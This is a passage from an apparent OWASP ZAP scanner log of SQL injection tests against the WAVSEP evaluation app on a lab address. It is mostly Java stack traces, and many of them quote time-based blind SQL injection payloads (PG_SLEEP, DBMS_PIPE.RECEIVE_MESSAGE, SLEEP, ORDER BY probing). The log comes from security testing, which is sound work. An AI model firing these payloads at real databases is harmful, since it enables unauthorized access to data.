FROM (SELECT(SLEEP(5)))CQrQ)-- Kdne at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681330 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 7937=(SELECT 7937 FROM PG_SLEEP(5)) AND (2689=2689] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 7937=(SELECT 7937 FROM PG_SLEEP(5)) AND (2689=2689 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681330 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1427=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(118)||CHR(71)||CHR(90),5) AND (2683=2683] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 1427=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(118)||CHR(71)||CHR(90),5) AND (2683=2683 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681331 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5746=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(66)||CHR(101)||CHR(80),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 5746=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(66)||CHR(101)||CHR(80),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681332 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8747=(SELECT 8747 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8747=(SELECT 8747 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681333 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 9983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(97)||CHR(88)||CHR(86),5) AND ('GJXQ'='GJXQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 9983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(97)||CHR(88)||CHR(86),5) AND ('GJXQ'='GJXQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681333 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 9152=(SELECT 9152 FROM PG_SLEEP(5)) AND ('OcUp'='OcUp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 9152=(SELECT 9152 FROM PG_SLEEP(5)) AND ('OcUp'='OcUp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681334 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1800=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(77)||CHR(77)||CHR(112),5) AND 'uQdN'='uQdN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 1800=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(77)||CHR(77)||CHR(112),5) AND 'uQdN'='uQdN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681335 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5107=(SELECT 5107 FROM PG_SLEEP(5)) AND 'xZEm'='xZEm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5107=(SELECT 5107 FROM PG_SLEEP(5)) AND 'xZEm'='xZEm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681336 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4852=(SELECT 4852 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4852=(SELECT 4852 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 7163=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(80)||CHR(78)||CHR(81),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 7163=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(80)||CHR(78)||CHR(81),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681338 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8696=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(122)||CHR(121)||CHR(78),5)-- UHwz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 8696=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(122)||CHR(121)||CHR(78),5)-- UHwz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681338 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4781=(SELECT 4781 FROM PG_SLEEP(5))-- cbwQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4781=(SELECT 4781 FROM PG_SLEEP(5))-- cbwQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681339 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681339 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 